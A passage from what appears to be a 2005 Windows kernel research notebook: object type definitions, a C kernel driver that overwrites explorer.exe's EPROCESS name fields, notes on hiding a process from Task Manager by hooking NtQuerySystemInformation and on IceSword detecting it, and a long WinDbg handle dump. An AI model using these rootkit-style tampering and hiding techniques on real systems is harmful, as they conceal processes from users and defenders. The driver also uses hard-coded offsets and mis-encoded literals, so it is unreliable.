A mechanism for referring to an object name indirectly.

Process

The virtual address space and control information necessary for the execution of a set of thread objects.

Thread

An executable entity within a process.

Job

A collection of processes manageable as a single entity through the job.

Section

A region of shared memory (known as a file mapping object in Windows).

File

An instance of an opened file or an I/O device.

Access token

The security profile (security ID, user rights, and so on) of a process or a thread.

Event

An object with a persistent state (signaled or not signaled) that can be used for synchronization or notification.

Semaphore

A counter that provides a resource gate by allowing some maximum number of threads to access the resources protected by the semaphore.

Mutex*

A synchronization mechanism used to serialize access to a resource.

Timer

A mechanism to notify a thread when a fixed period of time elapses.

IoCompletion

A method for threads to enqueue and dequeue notifications of the completion of I/O operations (known as an I/O completion port in the Windows API).

Key

A mechanism to refer to data in the registry. Although keys appear in the object manager namespace, they are managed by the configuration manager, in a way similar to that in which file objects are managed by file system drivers. Zero or more key values are associated with a key object; key values contain data about the key.

WindowStation

An object that contains a clipboard, a set of global atoms, and a group of desktop objects.

Desktop

An object contained within a window station. A desktop has a logical display surface and contains windows, menus, and hooks.


Note

The executive implements a total of 27 object types in Windows 2000 and 29 on Windows XP and Windows Server 2003. (These newer Windows versions add the DebugObject and KeyedEvent objects.) Many of these objects are for use only by the executive component that defines them and are not directly accessible by Windows APIs. Examples of these objects include Driver, Device, and EventPair.


Note

Externally in the Windows API, mutants are called mutexes. Internally, the kernel object that underlies mutexes is called a mutant.

2005年09月10日

把进程explorer的EPROCESS中的ImageFileName和SeAuditProcessCreationInfo中的名字全改了,结果windows 任务管理器里面依然写着explorer.exe
#include <ntddk.h>

// DWORD is not provided by ntddk.h; this listing uses it to hold raw 32-bit
// kernel addresses (the dumps on this page are from a 32-bit kernel).
typedef unsigned long DWORD;

void DriverUnloAd(IN PDRIVER_OBJECT Driver_object);

NTSTATUS DriverEntry (PDRIVER_OBJECT  pDriverObject,
                      PUNICODE_STRING pusRegistryPath);
// Walks the process list starting at the current process and returns the
// EPROCESS address whose PID matches, or 0 if not found (definition below).
DWORD FindProcessEPROC (int);

// Byte offsets into EPROCESS used by FindProcessEPROC: FLINKOFFSET is the
// offset of the Flink-based process list entry, PIDOFFSET the offset of the
// PID field. They are hard-coded for the author's kernel build (presumably
// 32-bit Windows XP, matching the dumps above) and are not checked against
// the running kernel version, so on any other build the walk reads garbage.
// NOTE(review): "0×" here is a mis-encoded "0x" from the page transcription;
// the literals must read 0x088 / 0x084 to compile.
int FLINKOFFSET = 0×088;
int PIDOFFSET = 0×084;

//////////////////////////////////////////////////////////////////////////////
// Driver entry point for the experiment described in the note above: locate
// the EPROCESS of one hard-coded PID (228 — explorer.exe on the author's
// machine) and overwrite two name fields in it by writing raw kernel memory,
// then observe what Task Manager shows. The note records the outcome: Task
// Manager still displayed explorer.exe, i.e. its process list does not come
// from these fields (the dumpbin output further down shows it importing
// NtQuerySystemInformation instead).
//
// Returns STATUS_SUCCESS (0) on every path, including the "PID not found"
// path, so the driver stays loaded even when it did nothing.
//
// NOTE(review): the field offsets 0x174 and 0x1f4 are build-specific and
// nothing validates the kernel version, the pointer read from eproc+0x1f4,
// or the size of the buffer it points to; on any other build these writes
// corrupt memory or bugcheck. "0×" in this listing is a mis-encoded "0x".
NTSTATUS DriverEntry(PDRIVER_OBJECT  pDriverObject,
      PUNICODE_STRING pusRegistryPAth)
{
 HANDLE hAndle = (HANDLE)0×0000000c;   // assigned but never used
 DWORD eproc = 0×00000000;             // EPROCESS address of the target process
 CHAR* pNAme;                          // -> ANSI name field inside that EPROCESS
 PUNICODE_STRING pUnicode_NAme;        // -> UNICODE_STRING reached through that EPROCESS

 pDriverObject->DriverUnload = DriverUnloAd;

 // Resolve the target by PID; FindProcessEPROC returns 0 when it is not found.
 eproc = (DWORD)FindProcessEPROC(228);
 if (eproc == 0×0000000) return 0;

 // eproc+0x174: per the note above, EPROCESS.ImageFileName on the author's
 // build (presumably the fixed-size inline char array). sizeof("shit shit")
 // is 10, so 10 bytes including the literal's NUL are written.
 pNAme = (CHAR*)(eproc + 0×174);
 RtlCopyMemory(pNAme,"shit shit",sizeof("shit shit"));
 //return STATUS_SUCCESS;
 // eproc+0x1f4: per the note above, SeAuditProcessCreationInfo, read here as
 // a pointer to a UNICODE_STRING. Its Buffer is overwritten with 9 bytes
 // (four UTF-16 's' code units plus the literal's trailing NUL) with no
 // NULL check on the pointer and no check of Length/MaximumLength.
 pUnicode_NAme = (PUNICODE_STRING)(*(LONG*)(eproc + 0×1f4));
 RtlCopyMemory(pUnicode_NAme->Buffer,"s\0s\0s\0s\0",sizeof("s\0s\0s\0s\0"));
 DbgPrint("here :>\n\n");

 return STATUS_SUCCESS;
}
//——————————————————————–
//////////////////////////////////////////////////////////////////////////////
// This function was originally written mostly in assembly language. Now let's
// make it readable to the masses.
//
// Returns the EPROCESS address of the process whose PID equals terminate_PID,
// or 0 when terminate_PID is 0 or when the walk arrives back at the starting
// PID without a match. The walk begins at the current process
// (PsGetCurrentProcess), follows the Flink stored at eproc+FLINKOFFSET, turns
// each link back into an EPROCESS address by subtracting FLINKOFFSET, and
// reads the PID at eproc+PIDOFFSET.
// The parameter name "terminate_PID" is historical; nothing is terminated here.
// NOTE(review): the list is walked without holding any lock, and the offsets
// are build-specific (see FLINKOFFSET/PIDOFFSET above). "0×" and "–" in this
// listing are mis-encoded "0x" and "-".
DWORD FindProcessEPROC (int terminate_PID)
{
 DWORD eproc       = 0×00000000;   // EPROCESS currently being examined
 int   current_PID = 0;            // PID read from that EPROCESS
 int   start_PID   = 0;            // PID where the walk began (cycle detection)
 int   i_count     = 0;            // number of links followed so far
 PLIST_ENTRY plist_active_procs;

 
 // PID 0 is never looked up; this returns 0 (== terminate_PID).
 if (terminate_PID == 0)
  return terminate_PID;

 eproc = (DWORD) PsGetCurrentProcess();
 start_PID = *((DWORD*)(eproc+PIDOFFSET));
 current_PID = start_PID;

 while(1)
 {
  if(terminate_PID == current_PID)
   return eproc;
  // Back at the starting PID after at least one step: full circle, not found.
  else if((i_count >= 1) && (start_PID == current_PID))
  {
   return 0×00000000;
  }
  else {
   plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);
   eproc = (DWORD) plist_active_procs->Flink;   // next entry in the (presumably circular) list
   eproc = eproc – FLINKOFFSET;                 // link address -> containing EPROCESS
   current_PID = *((int *)(eproc+PIDOFFSET));
   i_count++;
  }
 }
}
//——————————————————————–
// Unload routine registered by DriverEntry. It deliberately does nothing; in
// particular it does not restore the EPROCESS fields DriverEntry overwrote,
// so that modification outlives the driver itself.
void DriverUnloAd(IN PDRIVER_OBJECT Driver_object)
{
 (void)Driver_object;   // unused
}
//——————————————————————–
dumpbin c:\WINDOWS\system32\taskmgr.exe -imports
….
 ntdll.dll
            1001404 Import Address Table
            101209C Import Name Table
           FFFFFFFF time date stamp
           FFFFFFFF Index of first forwarder reference

   77F77974   50F  _chkstk
   77F5E9F6   51C  _snwprintf
   77F526AA   52B  _wcsicmp
   77F9C3A8   322  RtlTimeToElapsedTimeFields
   77F60C44   341  RtlUnwind
   77F758AA    63  NtClose
   77F78A93   564  strrchr
   77F99D5A   2A0  RtlLargeIntegerToChar
   77F51487   18E  RtlAnsiStringToUnicodeString
   77FA6269   526  _ui64tow
   77F6422E   54E  mbstowcs
   77F781B0   552  memmove
   77F76152    FB  NtQuerySystemInformation
   77F647FE   57F  wcstol
   77F765C6   148  NtShutdownSystem
   77F75CA4    A9  NtInitiatePowerAction
   77F75EFA    D2  NtPowerInformation
   77F75EAF    CD  NtOpenThread
…..
调用了NtQuerySystemInformation,奇怪,用户态不是应该只能用ZwQuerySystemInformation么
hook 系统服务NtQuerySystemInformation后,任务管理器里果然不显示了,但IceSword依然显示,并且用红

字标出进程被隐藏,
可以看出IceSword的第一列ImageName用的是EPROCESS中的ImageFileName,后面的全路径不知道是从哪里找的

,而且也不知道NtQuerySystemInformation是从哪里得到的进程信息
在进程的object中看看有没有带名字的,例如explorer的
kd> !handle 0 3 ffb67708
processor number 0, process ffb67708
PROCESS ffb67708  SessionId: 0  Cid: 06c0    Peb: 7ffdf000  ParentCid: 0684
    DirBase: 097c3000  ObjectTable: e1600ad0  HandleCount: 270.
    Image: explorer.exe

New version of handle table at e168f000 with 270 Entries in use
0004: Object: e1001078  GrantedAccess: 000f0003
Object: e1001078  Type: (80f0d730) KeyedEvent
    ObjectHeader: e1001060
        HandleCount: 16  PointerCount: 17
        Directory Object: e10015f0  Name: CritSecOutOfMemoryEvent

0008: Object: e13d1f60  GrantedAccess: 00000003
Object: e13d1f60  Type: (80f44ca0) Directory
    ObjectHeader: e13d1f48
        HandleCount: 16  PointerCount: 47
        Directory Object: e1000640  Name: KnownDlls

000c: Object: ffb69078  GrantedAccess: 00100020 (Inherit)
Object: ffb69078  Type: (80f42e70) File
    ObjectHeader: ffb69060
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \Documents and Settings\uty {HarddiskVolume1}

0010: Object: ffb58a18  GrantedAccess: 001f0003 (Protected)
Object: ffb58a18  Type: (80f0e490) Event
    ObjectHeader: ffb58a00
        HandleCount: 1  PointerCount: 2

0014: Object: e13cf030  GrantedAccess: 000f000f
Object: e13cf030  Type: (80f44ca0) Directory
    ObjectHeader: e13cf018
        HandleCount: 15  PointerCount: 19
        Directory Object: e1000640  Name: Windows

0018: Object: e17b1610  GrantedAccess: 001f0001 (Protected)
Object: e17b1610  Type: (80f430b0) Port
    ObjectHeader: e17b15f8
        HandleCount: 1  PointerCount: 17

001c: Object: e1685528  GrantedAccess: 000f003f (Protected)
Object: e1685528  Type: (80f0a350) Key
    ObjectHeader: e1685510
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE

0020: Object: e14cb368  GrantedAccess: 000f001f
Object: e14cb368  Type: (80f0a040) Section
    ObjectHeader: e14cb350
        HandleCount: 15  PointerCount: 16

0024: Object: 80e5b160  GrantedAccess: 000f037f
Object: 80e5b160  Type: (80f0d560) WindowStation
    ObjectHeader: 80e5b148
        HandleCount: 17  PointerCount: 30
        Directory Object: e14fb640  Name: WinSta0

0028: Object: 80e538a0  GrantedAccess: 000f01ff
Object: 80e538a0  Type: (80f0d390) Desktop
    ObjectHeader: 80e53888
        HandleCount: 9  PointerCount: 522
        Directory Object: 00000000  Name: Default

002c: Object: 80e5b160  GrantedAccess: 000f037f
Object: 80e5b160  Type: (80f0d560) WindowStation
    ObjectHeader: 80e5b148
        HandleCount: 17  PointerCount: 30
        Directory Object: e14fb640  Name: WinSta0

0030: Object: e14ce6c8  GrantedAccess: 0002000f
Object: e14ce6c8  Type: (80f44ca0) Directory
    ObjectHeader: e14ce6b0
        HandleCount: 16  PointerCount: 185
        Directory Object: e1000640  Name: BaseNamedObjects

0034: Object: 80e22558  GrantedAccess: 00100020
Object: 80e22558  Type: (80f42e70) File
    ObjectHeader: 80e22540
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-

Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

0038: Object: e17b1b38  GrantedAccess: 000f003f (Protected)
Object: e17b1b38  Type: (80f0a350) Key
    ObjectHeader: e17b1b20
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003

003c: Object: e1690fb8  GrantedAccess: 000f003f (Protected)
Object: e1690fb8  Type: (80f0a350) Key
    ObjectHeader: e1690fa0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003_CLASSES

0040: Object: ffb2b7b0  GrantedAccess: 00100020
Object: ffb2b7b0  Type: (80f42e70) File
    ObjectHeader: ffb2b798
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-

Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

0044: Object: ffb6e4a0  GrantedAccess: 00100020
Object: ffb6e4a0  Type: (80f42e70) File
    ObjectHeader: ffb6e488
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-

Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

0048: Object: e1692fb8  GrantedAccess: 000f003f
Object: e1692fb8  Type: (80f0a350) Key
    ObjectHeader: e1692fa0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER

004c: Object: ffb2b478  GrantedAccess: 00100020
Object: ffb2b478  Type: (80f42e70) File
    ObjectHeader: ffb2b460
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-

Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

0050: Object: e1712a20  GrantedAccess: 00020019
Object: e1712a20  Type: (80f0a350) Key
    ObjectHeader: e1712a08
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\WINDOWS

NT\CURRENTVERSION\DRIVERS32

0054: Object: ffb29cd8  GrantedAccess: 001f0001
Object: ffb29cd8  Type: (80f0d040) Mutant
    ObjectHeader: ffb29cc0
        HandleCount: 1  PointerCount: 2
        Directory Object: e14ce6c8  Name: ExplorerIsShellMutex

0058: Object: 80d57920  GrantedAccess: 00120001
Object: 80d57920  Type: (80f0d040) Mutant
    ObjectHeader: 80d57908
        HandleCount: 7  PointerCount: 8
        Directory Object: e14ce6c8  Name: ShimCacheMutex

005c: Object: e1536670  GrantedAccess: 00000002
Object: e1536670  Type: (80f0a040) Section
    ObjectHeader: e1536658
        HandleCount: 7  PointerCount: 8
        Directory Object: e14ce6c8  Name: ShimSharedMemory

0060: Object: ffb75d98  GrantedAccess: 001f0003
Object: ffb75d98  Type: (80f0dca0) Semaphore
    ObjectHeader: ffb75d80
        HandleCount: 3  PointerCount: 4
        Directory Object: e14ce6c8  Name: shell.{210A4BA0-3AEA-1069-A2D9-08002B30309D}

0064: Object: ffb274a0  GrantedAccess: 00100001
Object: ffb274a0  Type: (80f42e70) File
    ObjectHeader: ffb27488
        HandleCount: 1  PointerCount: 1

0068: Object: e1693560  GrantedAccess: 000f003f
Object: e1693560  Type: (80f0a350) Key
    ObjectHeader: e1693548
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name:

\REGISTRY\MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER

006c: Object: e1557160  GrantedAccess: 000f003f
Object: e1557160  Type: (80f0a350) Key
    ObjectHeader: e1557148
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER

0070: Object: ffb2a138  GrantedAccess: 001f0003
Object: ffb2a138  Type: (80f0e490) Event
    ObjectHeader: ffb2a120
        HandleCount: 1  PointerCount: 2

0074: Object: e155b8b8  GrantedAccess: 000f003f
Object: e155b8b8  Type: (80f0a350) Key
    ObjectHeader: e155b8a0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\CLASSES

0078: Object: e155b850  GrantedAccess: 000f003f
Object: e155b850  Type: (80f0a350) Key
    ObjectHeader: e155b838
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\COM3

007c: Object: ffb2a108  GrantedAccess: 001f0003
Object: ffb2a108  Type: (80f0e490) Event
    ObjectHeader: ffb2a0f0
        HandleCount: 1  PointerCount: 2

0080: Object: e13c86a0  GrantedAccess: 00000010
Object: e13c86a0  Type: (80f0a350) Key
    ObjectHeader: e13c8688
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER

0084: Object: ffb2a0d8  GrantedAccess: 001f0003
Object: ffb2a0d8  Type: (80f0e490) Event
    ObjectHeader: ffb2a0c0
        HandleCount: 1  PointerCount: 2

0088: Object: e17124e0  GrantedAccess: 000f003f
Object: e17124e0  Type: (80f0a350) Key
    ObjectHeader: e17124c8
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\CLASSES

008c: Object: ffb2a0a8  GrantedAccess: 001f0003
Object: ffb2a0a8  Type: (80f0e490) Event
    ObjectHeader: ffb2a090
        HandleCount: 1  PointerCount: 2

0090: Object: e178ac78  GrantedAccess: 00000010
Object: e178ac78  Type: (80f0a350) Key
    ObjectHeader: e178ac60
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER

0094: Object: ffb2a060  GrantedAccess: 001f0003
Object: ffb2a060  Type: (80f0e490) Event
    ObjectHeader: ffb2a048
        HandleCount: 1  PointerCount: 1

0098: Object: e17c0e88  GrantedAccess: 000f003f
Object: e17c0e88  Type: (80f0a350) Key
    ObjectHeader: e17c0e70
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\COM3

009c: Object: ffb25f88  GrantedAccess: 001f0003
Object: ffb25f88  Type: (80f0e490) Event
    ObjectHeader: ffb25f70
        HandleCount: 1  PointerCount: 2

00a0: Object: e17c0e20  GrantedAccess: 000f003f
Object: e17c0e20  Type: (80f0a350) Key
    ObjectHeader: e17c0e08
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\COM3

00a4: Object: ffb25f40  GrantedAccess: 001f0003
Object: ffb25f40  Type: (80f0e490) Event
    ObjectHeader: ffb25f28
        HandleCount: 1  PointerCount: 2

00a8: Object: e17c0db8  GrantedAccess: 000f003f
Object: e17c0db8  Type: (80f0a350) Key
    ObjectHeader: e17c0da0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID

00ac: Object: ffb25ec0  GrantedAccess: 001f0003
Object: ffb25ec0  Type: (80f0e490) Event
    ObjectHeader: ffb25ea8
        HandleCount: 1  PointerCount: 2

00b0: Object: e17c0d50  GrantedAccess: 000f003f
Object: e17c0d50  Type: (80f0a350) Key
    ObjectHeader: e17c0d38
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\CLASSES

00b4: Object: ffb25e40  GrantedAccess: 001f0003
Object: ffb25e40  Type: (80f0e490) Event
    ObjectHeader: ffb25e28
        HandleCount: 1  PointerCount: 2

00b8: Object: e1557020  GrantedAccess: 000f003f
Object: e1557020  Type: (80f0a350) Key
    ObjectHeader: e1557008
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\COM3

00bc: Object: ffb25dc0  GrantedAccess: 001f0003
Object: ffb25dc0  Type: (80f0e490) Event
    ObjectHeader: ffb25da8
        HandleCount: 1  PointerCount: 2

00c0: Object: e1557300  GrantedAccess: 00000010
Object: e1557300  Type: (80f0a350) Key
    ObjectHeader: e15572e8
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER

00c4: Object: ffb25d40  GrantedAccess: 001f0003
Object: ffb25d40  Type: (80f0e490) Event
    ObjectHeader: ffb25d28
        HandleCount: 1  PointerCount: 1

00c8: Object: e1557298  GrantedAccess: 000f003f
Object: e1557298  Type: (80f0a350) Key
    ObjectHeader: e1557280
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\COM3

00cc: Object: ffb25cc0  GrantedAccess: 001f0003
Object: ffb25cc0  Type: (80f0e490) Event
    ObjectHeader: ffb25ca8
        HandleCount: 1  PointerCount: 2

00d0: Object: e1557230  GrantedAccess: 000f003f
Object: e1557230  Type: (80f0a350) Key
    ObjectHeader: e1557218
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\COM3

00d4: Object: ffb25c40  GrantedAccess: 001f0003
Object: ffb25c40  Type: (80f0e490) Event
    ObjectHeader: ffb25c28
        HandleCount: 1  PointerCount: 2

00d8: Object: e15571c8  GrantedAccess: 000f003f
Object: e15571c8  Type: (80f0a350) Key
    ObjectHeader: e15571b0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\CLASSES\CLSID

00dc: Object: ffb25bc0  GrantedAccess: 001f0003
Object: ffb25bc0  Type: (80f0e490) Event
    ObjectHeader: ffb25ba8
        HandleCount: 1  PointerCount: 2

00e0: Object: e1a1cf40  GrantedAccess: 00000004
Object: e1a1cf40  Type: (80f0a040) Section
    ObjectHeader: e1a1cf28
        HandleCount: 5  PointerCount: 6
        Directory Object: e14ce6c8  Name: __R_000000000007_SMem__

00e4: Object: ffb2acd0  GrantedAccess: 001f0003
Object: ffb2acd0  Type: (80f0dca0) Semaphore
    ObjectHeader: ffb2acb8
        HandleCount: 1  PointerCount: 2
        Directory Object: e14ce6c8  Name: shell.{090851A5-EB96-11D2-8BE4-00C04FA31A66}

00e8: Object: ffb2afe0  GrantedAccess: 001f0001
Object: ffb2afe0  Type: (80f0d040) Mutant
    ObjectHeader: ffb2afc8
        HandleCount: 1  PointerCount: 1

00ec: Object: ffb2af50  GrantedAccess: 00100020
Object: ffb2af50  Type: (80f42e70) File
    ObjectHeader: ffb2af38
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-

Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

00f0: Object: ffb59990  GrantedAccess: 00100003
Object: ffb59990  Type: (80f0dca0) Semaphore
    ObjectHeader: ffb59978
        HandleCount: 1  PointerCount: 1

00f4: Object: ffb25cf0  GrantedAccess: 00100003
Object: ffb25cf0  Type: (80f0dca0) Semaphore
    ObjectHeader: ffb25cd8
        HandleCount: 1  PointerCount: 1

00f8: Object: ffbba468  GrantedAccess: 001f0003
Object: ffbba468  Type: (80f0dca0) Semaphore
    ObjectHeader: ffbba450
        HandleCount: 3  PointerCount: 4
        Directory Object: e14ce6c8  Name: shell.{A48F1A32-A340-11D1-BC6B-00A0C90312E1}

00fc: Object: e1552ce8  GrantedAccess: 0002001f
Object: e1552ce8  Type: (80f0a350) Key
    ObjectHeader: e1552cd0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\SOFTWARE\MICROSOFT\PLUS!\THEMES\APPLY

0100: Object: ffb2b718  GrantedAccess: 00100020
Object: ffb2b718  Type: (80f42e70) File
    ObjectHeader: ffb2b700
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-

Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

0104: Object: e180c570  GrantedAccess: 001f0001
Object: e180c570  Type: (80f430b0) Port
    ObjectHeader: e180c558
        HandleCount: 1  PointerCount: 1

0108: Object: e1555850  GrantedAccess: 0002001f
Object: e1555850  Type: (80f0a350) Key
    ObjectHeader: e1555838
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\CONTROL PANEL\APPEARANCE\NEW SCHEMES

010c: Object: e1553240  GrantedAccess: 0002001f
Object: e1553240  Type: (80f0a350) Key
    ObjectHeader: e1553228
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\CONTROL PANEL\APPEARANCE\NEW SCHEMES\27

0110: Object: e1554308  GrantedAccess: 0002001f
Object: e1554308  Type: (80f0a350) Key
    ObjectHeader: e15542f0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\CONTROL PANEL\APPEARANCE\NEW SCHEMES\27

0114: Object: e16a4978  GrantedAccess: 0002001f
Object: e16a4978  Type: (80f0a350) Key
    ObjectHeader: e16a4960
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\CONTROL PANEL\APPEARANCE\NEW SCHEMES\27\SIZES\0

0118: Object: ffb25ab0  GrantedAccess: 001f0003
Object: ffb25ab0  Type: (80f0e490) Event
    ObjectHeader: ffb25a98
        HandleCount: 1  PointerCount: 1

011c: Object: e1550020  GrantedAccess: 001f0001
Object: e1550020  Type: (80f430b0) Port
    ObjectHeader: e1550008
        HandleCount: 1  PointerCount: 1

0120: Object: ffb220c8  GrantedAccess: 001f0003
Object: ffb220c8  Type: (80f0e490) Event
    ObjectHeader: ffb220b0
        HandleCount: 1  PointerCount: 1

0124: Object: ffb220f8  GrantedAccess: 001f0003
Object: ffb220f8  Type: (80f0e490) Event
    ObjectHeader: ffb220e0
        HandleCount: 1  PointerCount: 1

0128: Object: ffb22e50  GrantedAccess: 001f0003
Object: ffb22e50  Type: (80f0e490) Event
    ObjectHeader: ffb22e38
        HandleCount: 1  PointerCount: 1

012c: Object: ffb67490  GrantedAccess: 001f03ff
Object: ffb67490  Type: (80f44528) Thread
    ObjectHeader: ffb67478
        HandleCount: 2  PointerCount: 4

0130: Object: e1550200  GrantedAccess: 001f0001
Object: e1550200  Type: (80f430b0) Port
    ObjectHeader: e15501e8
        HandleCount: 1  PointerCount: 1

0134: Object: ffb22e20  GrantedAccess: 001f0003
Object: ffb22e20  Type: (80f0e490) Event
    ObjectHeader: ffb22e08
        HandleCount: 1  PointerCount: 1

0138: Object: e16b48d8  GrantedAccess: 001f0001
Object: e16b48d8  Type: (80f430b0) Port
    ObjectHeader: e16b48c0
        HandleCount: 1  PointerCount: 12
        Directory Object: e12745a8  Name: OLE4

013c: Object: ffb269d8  GrantedAccess: 001f0003
Object: ffb269d8  Type: (80f42040) IoCompletion
    ObjectHeader: ffb269c0
        HandleCount: 2  PointerCount: 8

0140: Object: ffb6d3d8  GrantedAccess: 001f0003
Object: ffb6d3d8  Type: (80f42040) IoCompletion
    ObjectHeader: ffb6d3c0
        HandleCount: 1  PointerCount: 1

0144: Object: ffb269d8  GrantedAccess: 001f0003
Object: ffb269d8  Type: (80f42040) IoCompletion
    ObjectHeader: ffb269c0
        HandleCount: 2  PointerCount: 8

0148: Object: ffb21cd8  GrantedAccess: 001f03ff
Object: ffb21cd8  Type: (80f44528) Thread
    ObjectHeader: ffb21cc0
        HandleCount: 2  PointerCount: 3

014c: Object: ffb21fc0  GrantedAccess: 001f0003
Object: ffb21fc0  Type: (80f0e490) Event
    ObjectHeader: ffb21fa8
        HandleCount: 1  PointerCount: 1

0150: Object: e155b258  GrantedAccess: 000f003f
Object: e155b258  Type: (80f0a350) Key
    ObjectHeader: e155b240
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY\P3SITES

0154: Object: e169d4d0  GrantedAccess: 000f003f
Object: e169d4d0  Type: (80f0a350) Key
    ObjectHeader: e169d4b8
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-

839522115-1003\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY\P3GLOBAL

0158: Object: ffb21060  GrantedAccess: 001f0003
Object: ffb21060  Type: (80f0e490) Event
    ObjectHeader: ffb21048
        HandleCount: 1  PointerCount: 1

015c: Object: ffb21948  GrantedAccess: 001f03ff
Object: ffb21948  Type: (80f44528) Thread
    ObjectHeader: ffb21930
        HandleCount: 2  PointerCount: 4

0160: Object: ffb20f70  GrantedAccess: 001f0003 (Protected)
Object: ffb20f70  Type: (80f0e490) Event
    ObjectHeader: ffb20f58
        HandleCount: 1  PointerCount: 2

0164: Object: ffb206a8  GrantedAccess: 001f0003
Object: ffb206a8  Type: (80f0e490) Event
    ObjectHeader: ffb20690
        HandleCount: 1  PointerCount: 3

0168: Object: ffb205f0  GrantedAccess: 001f0003
Object: ffb205f0  Type: (80f0dad0) Timer
    ObjectHeader: ffb205d8
        HandleCount: 1  PointerCount: 2

016c: Object: ffb205c0  GrantedAccess: 001f0003 (Protected)
Object: ffb205c0  Type: (80f0e490) Event
    ObjectHeader: ffb205a8
        HandleCount: 1  PointerCount: 1

0170: Object: e169f768  GrantedAccess: 0000001b
Object: e169f768  Type: (80f0a350) Key
    ObjectHeader: e169f750
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SOFTWARE\CLASSES\HTTP\SHELL

0174: Object: ffb20328  GrantedAccess: 001f03ff
Object: ffb20328  Type: (80f44528) Thread
    ObjectHeader: ffb20310
        HandleCount: 2  PointerCount: 3

0178: Object: ffb24f78  GrantedAccess: 001f0003
Object: ffb24f78  Type: (80f42040) IoCompletion
    ObjectHeader: ffb24f60
        HandleCount: 1  PointerCount: 3

017c: Object: ffb25790  GrantedAccess: 001f0003
Object: ffb25790  Type: (80f0dad0) Timer
    ObjectHeader: ffb25778
        HandleCount: 1  PointerCount: 2

0180: Object: ffb1cda8  GrantedAccess: 001f03ff
